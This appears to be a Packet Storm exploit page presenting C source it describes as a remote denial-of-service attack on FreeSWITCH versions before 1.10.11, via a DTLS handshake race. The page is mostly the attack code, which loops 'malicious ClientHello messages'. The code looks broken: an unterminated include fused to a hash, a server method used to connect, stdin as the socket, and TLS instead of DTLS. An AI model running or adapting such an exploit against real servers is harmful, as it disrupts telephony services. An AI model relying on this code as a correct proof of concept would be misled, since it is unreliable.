FreeSWITCH versions prior to 1.10.11 remote denial of service exploit that leverages a race condition in the hello handshake phase of the DTLS protocol.
c9c3686ee337d8542426ced66a1b6b5eb7140101aed0bc4ec11b15ee6a810dab#include <stdio.h
#include <string.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#define IP "127.0.0.1"
#define PORT 5061
int main() {
SSL_library_init();
SSL_load_error_strings();
OpenSSL_add_ssl_algorithms();
const SSL_METHOD *method = TLS_server_method();
SSL_CTX *ctx = SSL_CTX_new(method);
if (!ctx) {
fprintf(stderr, "Unable to create SSL context\n");
ERR_print_errors_fp(stderr);
return 1;
}
SSL *ssl = SSL_new(ctx);
if (!ssl) {
fprintf(stderr, "Unable to create SSL\n");
ERR_print_errors_fp(stderr);
return 1;
}
if (SSL_set_fd(ssl, fileno(stdin)) <= 0) {
fprintf(stderr, "Unable to set SSL file descriptor\n");
ERR_print_errors_fp(stderr);
return 1;
}
if (SSL_set_connect_state(ssl) <= 0) {
fprintf(stderr, "Unable to set SSL connect state\n");
ERR_print_errors_fp(stderr);
return 1;
}
const SSL_CIPHER *cipher = SSL_CIPHER_find("TLS_NULL_WITH_NULL_NULL");
if (!cipher) {
fprintf(stderr, "Unable to find cipher\n");
ERR_print_errors_fp(stderr);
return 1;
}
SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL");
if (SSL_connect(ssl) <= 0) {
fprintf(stderr, "Unable to connect\n");
ERR_print_errors_fp(stderr);
return 1;
}
printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl)));
// Send malicious ClientHello messages continuously
while (1) {
if (SSL_connect(ssl) <= 0) {
fprintf(stderr, "Unable to connect\n");
ERR_print_errors_fp(stderr);
return 1;
}
sleep(1);
}
SSL_shutdown(ssl);
SSL_free(ssl);
SSL_CTX_free(ctx);
EVP_cleanup();
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed